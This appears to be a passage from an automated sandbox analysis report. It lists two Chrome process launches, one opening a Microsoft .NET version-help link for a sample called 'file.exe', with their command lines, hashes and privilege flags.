                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:22:26:34
                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1996,i,9808520038763490769,5132435854326033979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            No disassembly